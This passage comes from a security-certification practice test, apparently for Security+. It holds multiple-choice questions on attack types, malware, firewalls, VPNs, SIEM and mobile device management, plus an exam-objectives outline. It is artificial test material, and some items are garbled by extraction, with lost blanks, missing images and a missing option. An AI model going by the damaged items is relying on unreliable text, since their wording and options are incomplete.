- C. Eavesdropping
- D. Man-in-the-middle
- 125. You are a security administrator for Acme Corporation. You have discovered malware on
- some of your company’s machines. This malware seems to intercept calls from the web
- browser to libraries, and then manipulates the browser calls. What type of attack is this?
- A. Man-in-the-browser
- B. Man-in-the-middle
- C. Buffer overflow
- D. Session hijacking
- 126. Your company has hired a penetration testing firm to test the company network security.
- The penetration tester has just been able to achieve guest-level privileges on one low-
- security system. What best describes this phase of the test?
- A. Vulnerability scanning
- B. Initial exploit
- C. Black-box testing
- D. White-box testing
- 127. What is the primary risk from using outdated software?
- A. It may not have all the features you need.
- B. It may not have the most modern security features.
- C. It may no longer be supported by the vendor.
- D. It may be easier to break into than newer software.
- 128. You are responsible for software testing at Acme Corporation. You want to check all soft-
- ware for bugs that might be used by an attacker to gain entrance into the software or your
- network. You have discovered a web application that would allow a user to attempt to put
- a 64-bit value into a 4-byte integer variable. What is this type of flaw?
- A. Memory overflow
- B. Buffer overflow
- C. Variable overflow
- D. Integer overflow
- 129. Which type of virus is most difficult to analyze by reverse engineering?
- A. Polymorphic
- B. Macro
- C. Armored
- D. Boot sector
- 130. What type of attack attempts to deauthorize users from a resource, such as a wireless
- access point (WAP)?
- A. Disassociation
- B. Session hijacking
- C. Man-in-the-middle
- D. Smurf attack
- 131. John is a network administrator for a large retail chain. He has discovered that his
- DNS server is being attacked. The attack involves false DNS requests from spoofed IP
- addresses. The requests are far larger than normal. What type of attack is this?
- A. Amplification
- B. DNS poisoning
- C. DNS spoofing
- D. Smurf attack
- 132. Heidi is a security officer for an investment firm. Many of the employees in her firm travel
- frequently and access the company intranet from remote locations. Heidi is concerned about
- users logging in from public WiFi, as well as other people seeing information such as login
- credentials or customer data. Which of the following is Heidi’s most significant concern?
- A. Social engineering
- B. Shoulder surfing
- C. Man-in-the-middle attack
- D. CSRF
- 133. Cross-site scripting is an attack on the
- .
- that is based on the
- trusting the
- A. user, user, website
- B. user, website, user
- C. website, website, user
- D. user, website, website
- 134. You are a security officer for a large investment firm. Some of your stock traders handle
- very valuable accounts with large amounts of money. You are concerned about someone
- targeting these specific traders to get their login credentials and access account informa-
- tion. Which of the following best describes the attack you are concerned about?
- A. Spear phishing
- B. Man-in-the-middle
- C. Target phishing
- D. Vishing
- 135. You lead an incident response team for a large retail chain store. You have discovered
- what you believe is spyware on the point-of-sale systems. But the malware in question is
- encrypted, preventing you from analyzing it. What best describes this?
- A. An armored virus
- B. Ransomware
- C. Polymorphic virus
- D. Trojan horse
- 136. Jared has discovered malware on the workstations of several users. This particular mal-
- ware provides administrative privileges for the workstation to an external hacker. What
- best describes this malware?
- A. Trojan horse
- B. Logic bomb
- C. Multipartite virus
- D. Rootkit
- 137. Users in your company report someone has been calling their extension and claiming to
- be doing a survey for a large vendor. Based on the questions asked in the survey, you sus-
- pect that this is a scam to elicit information from your company’s employees. What best
- describes this?
- A. Spear phishing
- B. Vishing
- C. War dialing
- D. Robocalling
- 138. Cross-site request forgery is an attack on the
- trusting the
- .
- 33
- that is based on the
- A. website, website, user
- B. user, user website
- C. website, user, website
- D. user, website, user
- 139. What type of virus can infect both a file in the operating system and the boot sector?
- A. Multipartite
- B. Rootkit
- C. Ransomware
- D. Worm
- 140. John is analyzing a recent malware infection on his company network. He discovers mal-
- ware that can spread rapidly and does not require any interaction from the user. What
- best describes this malware?
- A. Worm
- B. Virus
- C. Logic bomb
- D. Trojan horse
- 141. Your company has issued some new security directives. One of these new directives is that
- all documents must be shredded before being thrown out. What type of attack is this try-
- ing to prevent?
- A. Phishing
- B. Dumpster diving
- C. Shoulder surfing
- D. Man-in-the-middle
- 142. What type of attack embeds malicious code into a document or spreadsheet?
- A. Logic bomb
- B. Rootkit
- C. Trojan horse
- D. Macro virus
- 143. You are a network security analyst for an online retail website. Users report that they
- have visited your site and had their credit cards stolen. You cannot find any evidence of
- any breach of your website. You begin to suspect that these users were lured to a fake site.
- You have found a website that is spelled exactly like your company site, with one letter
- different. What is this attack called?
- A. URL hijacking
- B. DNS poisoning
- C. Cross-site scripting
- D. Man-in-the-middle
- 144. You have discovered that someone has been trying to log on to your web server. The person
- has tried a wide range of likely passwords. What type of attack is this?
- A. Rainbow table
- B. Birthday attack
- C. Dictionary attack
- D. Spoofing
- 145. You have just started a new job as a security administrator for Acme Corporation. You
- discover they have weak authentication protocols. You are concerned that an attacker
- might simply capture and re-send a user’s login credentials. What type of attack is this?
- A. Replay attack
- B. IP spoofing
- C. Login spoofing
- D. Session hijacking
- 146. What is the primary difference between active and passive reconnaissance?
- A. Active will be done manually, passive with tools.
- B. Active is done with black-box tests and passive with white-box tests.
- C. Active is usually done by attackers and passive by testers.
- D. Active will actually connect to the network and could be detected; passive won’t.
- 147. What is the primary difference between a vulnerability scan and a penetration test?
- A. Vulnerability scans are done by employees and penetration tests by outside teams.
- B. Vulnerability scans only use tools; penetration tests are manual.
- C. Vulnerability scans just identify issues; penetration tests attempt to exploit them.
- D. Vulnerability scans are usually white-box tests; penetration tests are black-box tests.
- 148. When an attacker breaches one system and uses that as a base to attack a related system,
- what is this called?
- A. Man-in-the-middle
- B. Pivot
- C. Shimming
- D. Vishing
- 149. Terrance is conducting a penetration test for a client. The client is a major e-commerce
- company and is primarily concerned about security for their web server. He has just
- finished running Nmap and OWASP Zap on the target web server. What is this activity
- called?
- A. Passive scanning
- B. Black-box testing
- C. Active scanning
- D. White-box testing
- 150. You have just taken over as the CISO for a large bank. You are concerned about making
- sure all systems are secure. One major concern you have is security misconfiguration.
- Which of the following is not a common security misconfiguration?
- A. Unpatched operating system
- B. Default accounts with passwords
- C. Unneeded services running
- D. No firewall running
- +++++++++++
- 2
- Install and configure network components,
- both hardware- and software-based, to support
- organizational security.
- ■ ■
- ■ ■
- ■ ■
- Firewall
- ■ ■ ACL
- ■ ■ Application-based vs. network-based
- ■ ■ Stateful vs. stateless
- ■ ■ Implicit deny
- VPN concentrator
- ■ ■ Remote access vs. site-to-site
- ■ ■ IPSec
- ■ ■ Tunnel mode
- ■ ■ Transport mode
- ■ ■ AH
- ■ ■ ESP
- ■ ■ Split tunnel vs. full tunnel
- ■ ■ TLS
- ■ ■ Always-on VPN
- NIPS/NIDS
- ■ ■ Signature-based
- ■ ■ Heuristic/behavioral
- ■ ■ Anomaly
- ■ ■ Inline vs. passive
- ■ ■ In-band vs. out-of-band
- ■ ■ Rule
- ■ ■ False positive
- ■ ■ False negative
- Router
- ■ ■ ACLs
- ■ ■ Antispoofing
- Switch
- ■ ■ Port security
- ■ ■ Layer 2 vs. Layer 3
- ■ ■ Loop prevention
- ■ ■ Flood guard
- Proxy
- ■ ■ Forward and reverse proxy
- ■ ■ Transparent
- ■ ■ Application/multipurpose
- Load balancer
- ■ ■
- ■ ■
- Analytics
- Scheduling
- ■ ■ Affinity
- ■ ■ Round-robin
- ■ ■ Active-passive
- ■ ■ Active-active
- ■ ■ Virtual IPs
- Access point
- ■ ■ SSID
- ■ ■ MAC filtering
- ■ ■ Signal strength
- ■ ■ Band selection/width
- ■ ■ Antenna types and placement
- ■ ■ Fat vs. thin
- ■ ■ Controller-based vs. standalone
- SIEM
- ■ ■
- Aggregation■ ■
- ■ ■
- ■ ■
- ■ ■ Correlation
- ■ ■ Automated alerting and triggers
- ■ ■ Time synchronization
- ■ ■ Event deduplication
- ■ ■ Logs/WORM
- DLP
- ■ ■ USB blocking
- ■ ■ Cloud-based
- ■ ■ Email
- NAC
- ■ ■ Dissolvable vs. permanent
- ■ ■ Host health checks
- ■ ■ Agent vs. agentless
- Mail gateway
- ■ ■ Spam filter
- ■ ■ DLP
- ■ ■ Encryption
- ■ ■ Bridge
- ■ ■ SSL/TLS accelerators
- ■ ■ SSL decryptors
- ■ ■ Media gateway
- ■ ■ Hardware security module
- ✓ ✓ 2.2 Given a scenario, use appropriate software tools to
- assess the security posture of an organization.
- ■ ■ Protocol analyzer
- ■ ■ Network scanners
- ■ ■
- Rogue system detection
- ■ ■
- Network mapping
- ■ ■ Wireless scanners/cracker
- ■ ■ Password cracker
- ■ ■ Vulnerability scanner
- ■ ■ Configuration compliance scanner■ ■ Exploitation frameworks
- ■ ■ Data sanitization tools
- ■ ■ Steganography tools
- ■ ■ Honeypot
- ■ ■ Backup utilities
- ■ ■ Banner grabbing
- ■ ■ Passive vs. active
- ■ ■ Command line tools
- ■ ■ ping
- ■ ■ netstat
- ■ ■ tracert
- ■ ■ nslookup/dig
- ■ ■ arp
- ■ ■ ipconfig/ip/ifconfig
- ■ ■ tcpdump
- ■ ■ nmap
- ■ ■ netcat
- ✓ ✓ 2.3 Given a scenario, troubleshoot common
- security issues.
- ■ ■ Unencrypted credentials/clear text
- ■ ■ Logs and events anomalies
- ■ ■ Permission issues
- ■ ■ Access violations
- ■ ■ Certificate issues
- ■ ■ Data exfiltration
- ■ ■ Misconfigured devices
- ■ ■ Firewall
- ■ ■ Content filter
- ■ ■ Access points
- ■ ■ Weak security configurations
- ■ ■ Personnel issues
- ■ ■
- Policy violation■ ■ Insider threat
- ■ ■ Social engineering
- ■ ■ Social media
- ■ ■ Personal email
- ■ ■ Unauthorized software
- ■ ■ Baseline deviation
- ■ ■ License compliance violation (availability/integrity)
- ■ ■ Asset management
- ■ ■ Authentication issues
- ✓ ✓ 2.4 Given a scenario, analyze and interpret output from
- security technologies.
- ■ ■ HIDS/HIPS
- ■ ■ Antivirus
- ■ ■ File integrity check
- ■ ■ Host-based firewall
- ■ ■ Application whitelisting
- ■ ■ Removable media control
- ■ ■ Advanced malware tools
- ■ ■ Patch management tools
- ■ ■ UTM
- ■ ■ DLP
- ■ ■ Data execution prevention
- ■ ■ Web application firewall
- ✓ ✓ 2.5 Given a scenario, deploy mobile devices securely.
- ■ ■
- Connection methods
- ■ ■ Cellular
- ■ ■ WiFi
- ■ ■ SATCOM
- ■ ■ Bluetooth
- ■ ■ NFC
- ■ ■ ANT■ ■
- ■ ■
- ■ ■ Infrared
- ■ ■ USB
- Mobile device management concepts
- ■ ■ Application management
- ■ ■ Content management
- ■ ■ Remote wipe
- ■ ■ Geofencing
- ■ ■ Geolocation
- ■ ■ Screen locks
- ■ ■ Push notification services
- ■ ■ Passwords and pins
- ■ ■ Biometrics
- ■ ■ Context-aware authentication
- ■ ■ Containerization
- ■ ■ Storage segmentation
- ■ ■ Full device encryption
- Enforcement and monitoring for:
- ■ ■ Third-party app stores
- ■ ■ Rooting/jailbreaking
- ■ ■ Sideloading
- ■ ■ Custom firmware
- ■ ■ Carrier unlocking
- ■ ■ Firmware OTA updates
- ■ ■ Camera use
- ■ ■ SMS/MMS
- ■ ■ External media
- ■ ■ USB OTG
- ■ ■ Recording microphone
- ■ ■ GPS tagging
- ■ ■ WiFi direct/ad hoc
- ■ ■ Tethering
- ■ ■ Payment methods■ ■
- Deployment models
- ■ ■ BYOD
- ■ ■ COPE
- ■ ■ CYOD
- ■ ■ Corporate-owned
- ■ ■ VDI
- ✓ ✓ 2.6 Given a scenario, implement secure protocols.
- ■ ■
- ■ ■
- Protocols
- ■ ■ DNSSEC
- ■ ■ SSH
- ■ ■ S/MIME
- ■ ■ SRTP
- ■ ■ LDAPS
- ■ ■ FTPS
- ■ ■ SFTP
- ■ ■ SNMPv3
- ■ ■ SSL/TLS
- ■ ■ HTTPS
- ■ ■ Secure POP/IMAP
- Use cases
- ■ ■ Voice and video
- ■ ■ Time synchronization
- ■ ■ Email and web
- ■ ■ File transfer
- ■ ■ Directory services
- ■ ■ Remote access
- ■ ■ Domain name resolution
- ■ ■ Routing and switching
- ■ ■ Network address allocation
- ■ ■ Subscription services
- ■
- Technologies and Tools
- 1. John is looking for a new firewall for a small company. He is concerned about DoS
- attacks, particularly the SYN flood. Which type of firewall would give the best protection
- against the SYN flood?
- A. Packet filter
- B. Application gateway
- C. Bastion
- D. SPI
- 2. You are responsible for network security at an insurance company. A lot of employ-
- ees bring their own devices. You have security concerns about this. You have decided
- to implement a process whereby when users connect to your network, their devices are
- scanned. If a device does not meet your minimum security requirements, it is not allowed
- to connect. What best describes this?
- A. NAC
- B. SPI
- C. IDS
- D. BYOD
- 3. Ahmed is responsible for VPN connections at his company. His company uses IPSec
- exclusively. He has decided to implement IPSec in a mode that encrypts the data of only
- the packet, not the headers. What is this called?
- A. Tunneling
- B. IKE
- C. ESP
- D. Transport
- 4. Maria is responsible for monitoring IDS activity on her company’s network. Twice in the
- past month there has been activity reported on the IDS that investigation has shown was
- legitimate traffic. What best describes this?
- A. False negative
- B. Passive
- C. Active
- D. False positive
- 5. Juanita is a network administrator for a large university. The university has numerous
- systems, each with logs she must monitor and analyze. What would be the best approach
- for her to view and analyze logs from a central server?
- A. NAC
- B. Port forwarding
- C. IDS
- D. SIEMChapter 2
- 6. Enrique is responsible for web application security at his company. He is concerned about
- attacks such as SQL injection. Which of the following devices would provide the best pro-
- tection for web attacks on his web application server?
- A. ACL
- B. SPI
- C. WAF
- D. IDS
- 7. ACME Company has several remote offices. The CIO wants to set up permanent secure
- connections between the remote offices and the central office. What would be the best
- solution for this?
- A. L2TP VPN
- B. IPSEC VPN
- C. Site-to-site VPN
- D. Remote-access VPN
- 8. Mary is responsible for network security at a medium-sized insurance company. She is
- concerned that the offices are too open to public traffic and someone could simply con-
- nect a laptop to an open RJ45 jack and access the network. Which of the following would
- best address this concern?
- A. ACL
- B. IDS
- C. VLAN
- D. Port security
- 9. You are the network administrator for an e-commerce company. You are responsible for
- the web server cluster. You are concerned about not only failover, but also load-balancing
- and using all the servers in your cluster to accomplish load-balancing. What should you
- implement?
- A. Active-active
- B. Active-passive
- C. Affinity
- D. Round-robin
- 10. Donald is working as a network administrator. He is responsible for the database cluster.
- Connections are load-balanced in the cluster by each new connection being simply sent to
- the next server in the cluster. What type of load-balancing is this?
- A. Round-robin
- B. Affinity
- C. Weighted
- D. Rotating
- 11. Gerald is setting up new wireless access points throughout his company’s building. The
- wireless access points have just the radio transceiver, with no additional functionality.
- What best describes these wireless access points?
- A. Fat
- B. Repeater
- C. Thick
- D. Thin
- 12. Mohaned is an IT manager for a hotel. His hotel wants to put wireless access points on
- each floor. The specifications state that the wireless access points should have minimal
- functionality, with all the configuration, authentication, and other functionality centrally
- controlled. What type of wireless access points should Mohaned consider purchasing?
- A. Fat
- B. Controller-based
- C. Stand-alone
- D. 801.11i
- 13. What IPSec protocol provides authentication and encryption?
- A. AH
- B. ESP
- C. IKE
- D. ISAKMP
- 14. Terrance is implementing IPSec. He wants to ensure that the packets are encrypted, and
- that the packet and all headers are authenticated. What should he implement?
- A. AH
- B. ESP
- C. AH and ESP
- D. IKE
- 15. You are responsible for security at your company. One of management’s biggest concerns
- is that employees might exfiltrate sensitive data. Which of the following would you
- implement first?
- A. IPS
- B. Routine audits of user machines
- C. VLAN
- D. USB blocking
- 16. You are responsible for email server security in your company. You want to implement
- encryption of all emails, using third-party authenticated certificates. What protocol
- should you implement?
- A. IMAP
- B. S/MIMEChapter 2
- C. PGP
- D. SMTP-S
- 17. Joanne is responsible for all remote connectivity to her company’s network. She knows
- that administrators frequently log in to servers remotely to execute command-line com-
- mands and Linux shell commands. She wants to make sure this can only be done if the
- transmission is encrypted. What protocol should she use?
- A. HTTPS
- B. RDP
- C. Telnet
- D. SSH
- 18. You are responsible for network management at your company. You have been using
- SNMP for many years. You are currently using SNMP v2. A colleague has recently
- suggested you upgrade to SNMP v3. What is the primary benefit of SNMP v3?
- A. It is much faster.
- B. It integrates with SIEM.
- C. It uses CHAP authentication.
- D. It is encrypted.
- 19. Employees in your company are allowed to use tablets. They can select a tablet from four
- different models approved by the company but purchased by the employee. What best
- describes this?
- A. BYOD
- B. CYOD
- C. COPE
- D. BYOE
- 20. Mahmoud is considering moving all company desktops to a VDI deployment. Which of
- the following would be a security advantage of VDI?
- A. Employees can work from any computer in the company.
- B. VDI is more resistant to malware.
- C. Patch management is centrally controlled.
- D. It eliminates man-in-the-middle attacks.
- 21. You have been assigned to select a backup communication method for your company to
- use in case of significant disasters that disrupt normal communication. Which option
- would provide the most reliability?
- A. Cellular
- B. WiFi
- C. SATCOM
- D. VoIP
- 22. John is concerned about the security of data on smartphones and tablets that his company
- issues to employees. Which of the following would be most effective in preventing data
- loss, should a device be stolen?
- A. Remote wipe
- B. Geolocation
- C. Strong PIN
- D. Limited data storage
- 23. What does geofencing accomplish?
- A. Provides the location for a mobile device.
- B. Limits the range a mobile device can be used in.
- C. Determines WiFi coverage areas.
- D. Segments the WiFi.
- 24. What best describes mobile device content management?
- A. Limiting how much content can be stored.
- B. Limiting the type of content that can be stored.
- C. Blocking certain websites.
- D. Digitally signing authorized content.
- 25. Frank believes there could be a problem accessing the DHCP server from a specific client.
- He wants to check by getting a new dynamic IP. What command will do this?
- A. ipconfig /request
- B. NETSTAT -renew
- C. ipconfig /renew
- D. NETSTAT /request
- 26. Teresa is responsible for network administration at a health club chain. She is trying for
- find a communication technology that uses low power and can spend long periods in
- low-power sleep modes. Which of the following technologies would be the best fit?
- A. WiFi
- B. Cellular
- C. Bluetooth
- D. ANT
- 27. What technology was first introduced in Windows Vista and still exists in Windows that
- helps prevent malware by requiring user authorization to run executables?
- A. DEP
- B. DLP
- C. UTM
- D. ANT
- 28. John is responsible for security of his company’s new e-commerce server. He wants to
- ensure that online transactions are secure. What technology should he use?
- A. L2TP
- B. IPSec
- C. SSL
- D. TLS
- 29. Frank is a network administrator for a small college. The college has implemented a
- simple NIDS. However, the NIDS seems to only catch well-known attacks. What
- technology is this NIDS likely missing?
- A. Heuristic scanning
- B. Signature scanning
- C. Passive scanning
- D. Active scanning
- 30. You are concerned about an attacker enumerating all of your network. What protocol
- might help at least mitigate this issue?
- A. HTTPS
- B. TLS
- C. IPSec
- D. LDAPS
- 31. You have been asked to implement a secure protocol for transferring files that uses digital
- certificates. Which protocol would be the best choice?
- A. FTP
- B. SFTP
- C. FTPS
- D. SCP
- 32. Ahmed is responsible for VoIP at his company. He has been directed to ensure that all
- VoIP calls have the option to be encrypted. What protocol is best suited for security
- VoIP calls?
- A. SIP
- B. TLS
- C. SRTP
- D. SSH
- 33. What is the purpose of screen locks on mobile devices?
- A. To encrypt the device
- B. To limit access to the device
- C. To load a specific user’s apps
- D. To connect to WiFi
- 34. Maria is a security engineer with a large bank. Her CIO has asked her to investigate
- the use of context-aware authentication for online banking. Which of the following best
- describes context-aware authentication?
- A. In addition to username and password, authentication is based on the entire context
- (location, time of day, action being attempted, etc.).
- B. Without a username or password, authentication is based on the entire context
- (location, time of day, action being attempted, etc.).
- C. Authentication that requires a username and password, but in the context of a token
- or digital certificate
- D. Authentication that requires a username and password, but not in the context of a
- token or digital certificate
- 35. What does application management accomplish for mobile devices?
- A. Only allows applications from the iTunes store to be installed
- B. Ensures the company has a list of all applications on the devices
- C. Ensures only approved applications are installed on the devices
- D. Updates patches on all applications on mobile devices
- Dominick is responsible for security at a medium-sized insurance company. He is very
- concerned about detecting intrusions. The IDS he has purchased states that he must have
- an IDS on each network segment. What type of IDS is this?
- A. Active
- B. IPS
- C. Passive
- D. Inline
- 37. Remote employees at your company frequently need to connect to both the secure
- company network via VPN and open public websites, simultaneously. What technology
- would best support this?
- A. Split tunnel
- B. IPSec
- C. Full tunnel
- D. TLS
- 38. Denish is looking for a solution that will allow his network to retrieve information from a
- wide range of web resources, while all traffic passes through a proxy. What would be the
- best solution?
- A. Forward proxy
- B. Reverse proxy
- C. SPI
- D. Open proxy
- 39. Someone has been rummaging through your company’s trash bins seeking to find
- documents, diagrams, or other sensitive information that has been thrown out. What
- is this called?
- A. Dumpster diving
- B. Trash diving
- C. Social engineering
- D. Trash engineering
- 40. Derrick is responsible for a web server cluster at his company. The cluster uses various
- load-balancing protocols. Derrick wants to ensure that clients connecting from Europe are
- directed to a specific server in the cluster. What would be the best solution to his problem?
- A. Affinity
- B. Binding
- C. Load balancing
- D. Round-robin
- 41. Teresa is responsible for WiFi security in her company. Her main concern is that there are
- many other offices in the building her company occupies and that someone could easily
- attempt to breach their WiFi from one of these locations. What technique would be best
- in alleviating her concern?
- A. Using thin WAPs
- B. Geofencing
- C. Securing the Admin screen
- D. WAP placement
- 42. Juan is responsible for the SIEM in his company. The SIEM aggregates logs from 12 servers.
- In the event that a breach is discovered, which of the following would be Juan’s most impor-
- tant concern?
- A. Event duplication
- B. Time synchronization
- C. Impact assessment
- D. Correlation
- 43. When you are considering an NIDS or NIPS, what are your two most important
- concerns?
- A. Cost and false positives
- B. False positives and false negatives
- C. Power consumption and cost
- D. Management interface and cost
- 44. Shelly is very concerned about unauthorized users connecting to the company routers.
- She would like to prevent spoofing. What is the most essential antispoofing technique for
- routers?
- A. ACL
- B. Logon
- C. NIPS
- D. NIDS
- 45. Farès has implemented a flood guard. What type of attack is this most likely to defend
- against?
- A. SYN attack
- B. DNS poisoning
- C. MAC spoofing
- D. ARP spoofing
- 46. Terrance is trying to get all of his users to connect to a certificate server on his network.
- However, some of the users are using machines that are incompatible with the certificate
- server, and changing those machines is not an option. Which of the following would be
- the best solution for Terrance?
- A. Use an application proxy for the certificate server.
- B. Use NAT with the certificate server.
- C. Change the server.
- D. Implement a protocol analyzer.
- 47. John is implementing virtual IP load-balancing. He thinks this might alleviate network
- slowdowns, and perhaps even mitigate some of the impact of a denial-of-service attack.
- What is the drawback of virtual IP load-balancing?
- A. It is resource-intensive.
- B. Most servers don’t support it.
- C. It is connection-based, not load-based.
- D. It works only on Unix/Linux servers.
- 48. There has been a breach of the ACME network. John manages the SIEM at ACME. Part
- of the attack disrupted NTP; what SIEM issue would this most likely impact?
- A. Time synchronization
- B. Correlation
- C. Event duplication
- D. Events not being logged
- 49. What command would produce the image shown here?
- A. ping -n 6 -l 100 192.168.1.1
- B. ping 192.168.1.1 -n 6 -s 100
- C. ping #6 s 100 192.168.1.1
- D. ping -s 6 -w 100 192.168.1.1
- 50. You are a security officer for a large law firm. You are concerned about data loss preven-
- tion. You have limited the use of USBs and other portable media, you use an IDS to look
- for large volumes of outbound data, and a guard searches all personnel and bags before
- they leave the building. What is a key step in DLP that you have missed?
- A. Portable drives
- B. Email
- C. Bluetooth
- D. Optical media
- 51. Which of the following email security measures would have the most impact on
- phishing emails?
- A. Email encryption
- B. Hardening the email server
- C. Digitally signing email
- D. Spam filter
- 52. Joanne has implemented TLS for communication with many of her networks servers. She
- wants to ensure that the traffic cannot be sniffed. However, users now complain that this
- is slowing down connectivity. Which of the following is the best solution?
- A. Increase RAM on servers.
- B. Change routers to give more bandwidth to traffic to these servers.
- C. Implement TLS accelerators.
- D. Place all servers in clusters with extensive load-balancing.
- 53. Olivia has discovered steganography tools on an employee’s computer. What is the
- greatest concern regarding employees having steganography tools?
- A. Password cracking
- B. Data exfiltration
- C. Hiding network traffic
- D. Malware
- 54. What command would generate the output shown here?
- A. netstat -a
- B. netstat -o
- C. arp -a
- D. arp -g
- 55. John has discovered that an attacker is trying to get network passwords by using software
- that attempts a number of passwords from a list of common passwords. What type of
- attack is this?
- A. Dictionary
- B. Rainbow table
- C. Brute force
- D. Session hijacking
- 56. Isabella has found netcat installed on an employee’s computer. That employee is not
- authorized to have netcat. What security concern might this utility present?
- A. It is a password cracker.
- B. It is a packet sniffer.
- C. It is a network communication utility.
- D. It is a DoS tool.
- 57. Omar is a network administrator for ACME Company. He is responsible for the cer-
- tificate authorities within the corporate network. The CAs publish their CRLs once per
- week. What, if any, security issue might this present?
- A. Revoked certificates still being used
- B. Invalid certificates being issued
- C. No security issue
- D. Certificates with weak keys
- 58. Hans is a network administrator for a large bank. He is concerned about employees vio-
- lating software licenses. What would be the first step in addressing this issue?
- A. Performing software audits
- B. Scanning the network for installed applications
- C. Establishing clear policies
- D. Blocking the ability of users to install software
- 59. You are responsible for authentication methods at your company. You have implemented
- fingerprint scanners to enter server rooms. Frequently people are being denied access to
- the server room, even though they are authorized. What problem is this?
- A. FAR
- B. FRR
- C. CER
- D. EER
- 60. John is responsible for network security at a very small company. Due to both budget
- constraints and space constraints, John can select only one security device. What should
- he select?
- A. Firewall
- B. Antivirus
- C. IDS
- D. UTM
- 61. You are responsible for security at Acme Company. Recently, 20 new employee network
- accounts were created, with the default privileges for the network. You have discovered
- that eight of these have privileges that are not needed for their job tasks. Which security
- principle best describes how to avoid this problem in the future?
- A. Least privileges
- B. Separation of duties
- C. Implicit deny
- D. Weakest link
- 62. Mary is concerned that SIEM logs at her company are not being stored long enough, or
- securely enough. She is aware that it is possible a breach might not be discovered until
- long after it occurs. This would require the company to analyze older logs. It is important
- that Mary find an SIEM log backup solution that can a) handle all the aggregate logs of
- the SIEM, b) be maintained for a long period of time, and c) be secure. What solution
- would be best for her?
- A. Back up to large-capacity external drives.
- B. Back up to large-capacity backup tapes.
- C. Back up to WORM storage.
- D. Back up to tapes that will be stored off-site.
- 63. Elizabeth is responsible for SIEM systems in her company. She monitors the company’s
- SIEM screens every day, checking every hour. What, if any, would be a better approach
- for her to keep up with issues that appear in the logs?
- A. Automatic alerts
- B. Having logs forwarded to her email
- C. Nothing, this is fine.
- 64. You are responsible for network security at a university. Faculty members are issued
- laptops. However, many of the faculty members leave the laptops in their offices most of
- the time (sometimes even for weeks). You are concerned about theft of laptops. In this
- scenario, what would be the most cost-effective method of securing the laptops?
- A. FDE
- B. GPS tagging
- C. Geofencing
- D. Tethering
- 65. You work at a defense contracting company. You are responsible for mobile device
- security. Some researchers in your company use company-issued tablets for work. These
- tablets may contain sensitive, even classified data. What is the most important security
- measure for you to implement?
- A. FDE
- B. GPS tagging
- C. Geofencing
- D. Content management
- 66. When using any HIDS/HIPS or NIDS/NIPS, the output is specific to the vendor. How-
- ever, what is the basic set of information that virtually all HIDSs/HIPSs or
- NIDSs/NIPSs provide?
- A. IP addresses (sender and receiver), ports (sender and receiver), and protocol
- B. IP addresses (sender and receiver), ports (sender and receiver), and attack type
- C. IP addresses (sender and receiver), ports (sender and receiver), usernames, and
- machine names
- D. Usernames, machine names, and attack type
- 67. You are responsible for firewalls in your company. You are reviewing the output of the
- gateway firewall. What basic information would any firewall have in its logs?
- A. For all traffic: the source and destination IP and port, protocol, and whether it was
- allowed or denied
- B. For only blocked traffic: the source and destination IP and port as well as the reason
- for the traffic being denied/blocked
- C. For all traffic: the source and destination IP and port, whether it was allowed or
- denied, and the reason it was denied/blocked
- D. For only blocked traffic: the source and destination IP, protocol, and the reason it
- was denied/blocked
- 68. Teresa is responsible for incident response at ACME Company. There was a recent breach
- of the network. The breach was widespread and affected many computers. As part of the
- incident response process, Teresa will collect the logs from the SIEM, which aggregates
- logs from 20 servers. Which of the following should she do first?
- A. Event de-duplication
- B. Log forwardingChapter 2
- C. Identify the nature of the attack
- D. Identify the source IP of the attack
- 69. Hector is responsible for NIDS/NIPS in his company. He is configuring a new NIPS
- solution. What part of the NIPS collects data?
- A. Sensor
- B. Data source
- C. Manager
- D. Analyzer
- 70. Gerald is a network administrator for a small financial services company. He is respon-
- sible for controlling access to resources on his network. What mechanism is responsible
- for blocking access to a resource based on the requesting IP address?
- A. ACL
- B. NIPS
- C. HIPS
- D. Port blocking
- 71. Elizabeth is responsible for secure communications at her company. She wants to give
- administrators the option to log in remotely and to execute command-line functions, but
- she wants this to only be possible via a secure, encrypted connection. What action should
- she take on the firewall?
- A. Block port 23 and allow ports 20 and 21.
- B. Block port 22 and allow ports 20 and 21.
- C. Block port 22 and allow port 23.
- D. Block port 23 and allow port 22.
- 72. Mark is looking for a proxy server for his network. The purpose of the proxy server is
- to ensure that the web servers are hidden from outside clients. All of the different web
- servers should appear to the outside world as if they were the proxy server. What type of
- proxy server would be best for Mark to consider?
- A. Forward
- B. Reverse
- C. Transparent
- D. Firewall
- 73. Your company has hired an outside security firm to perform various tests of your
- network. During the vulnerability scan you will provide that company with logins for
- various systems (i.e., database server, application server, web server, etc.) to aid in their
- scan. What best describes this?
- A. A white-box test
- B. A gray-box test
- C. A credentialed scan
- D. A logged-in scan
- 74. Lars is responsible for incident response at ACME Company. He is particularly concerned
- about the network segment that hosts the corporate web servers. He wants a solution that
- will detect potential attacks and notify the administrator so the administrator can take
- whatever action he or she deems appropriate. Which of the following would be the best
- solution for Lars?
- A. HIDS
- B. HIPS
- C. NIDS
- D. NIPS
- 75. Mia is responsible for security devices at her company. She is concerned about detecting
- intrusions. She wants a solution that would work across entire network segments. How-
- ever, she wants to ensure that false positives do not interrupt work flow. What would be
- the best solution for Mia to consider?
- A. HIDS
- B. HIPS
- C. NIDS
- D. NIPS
- 76. Abigail is a security manager for a small company. Many employees want to use handheld
- devices, such as smartphones and tablets. The employees want to use these devices both
- for work and outside of work. Abigail is concerned about security issues. Which of the
- following would be the most secure solution?
- A. COPE
- B. CYOD
- C. Geotagging
- D. BYOD
- 77. You are responsible for always-on VPN connectivity for your company. You have been
- told that you must use the most secure mode for IPSec that you can. Which of the follow-
- ing would be the best for you to select?
- A. Tunneling
- B. AH
- C. IKE
- D. Transport
- 78. Debra is the network administrator for her company. Her company’s web servers are all in
- a cluster. Her concern is this: if one of the servers in the cluster fails, will the backup server
- be capable of running for a significant amount of time? She wants to make sure that the
- backup won’t soon fail. What would be her best choice in clustering?
- A. Active-active
- B. Round-robin
- C. Affinity
- D. Active-passive
- 79. Omar is responsible for wireless security in his company. He wants completely different
- WiFi access (i.e., a different SSID, different security levels, and different authentication
- methods) in different parts of the company. What would be the best choice for Omar to
- select in WAPs?
- A. Fat
- B. Thin
- C. Repeater
- D. Full
- 80. Lilly is a network administrator for a medium-sized financial services company. She wants
- to implement company-wide encryption and digital signing of emails. But she is concerned
- about cost, since there is a very limited budget for this. What would be her best choice?
- A. SMTPS
- B. S/MIME
- C. IMAPS
- D. PGP
- 81. Edward is a security manager for a bank. He has recently been reading a great deal
- about malware that accesses system memory. He wants to find a solution that would
- stop programs from utilizing system memory. Which of the following would be the
- best solution?
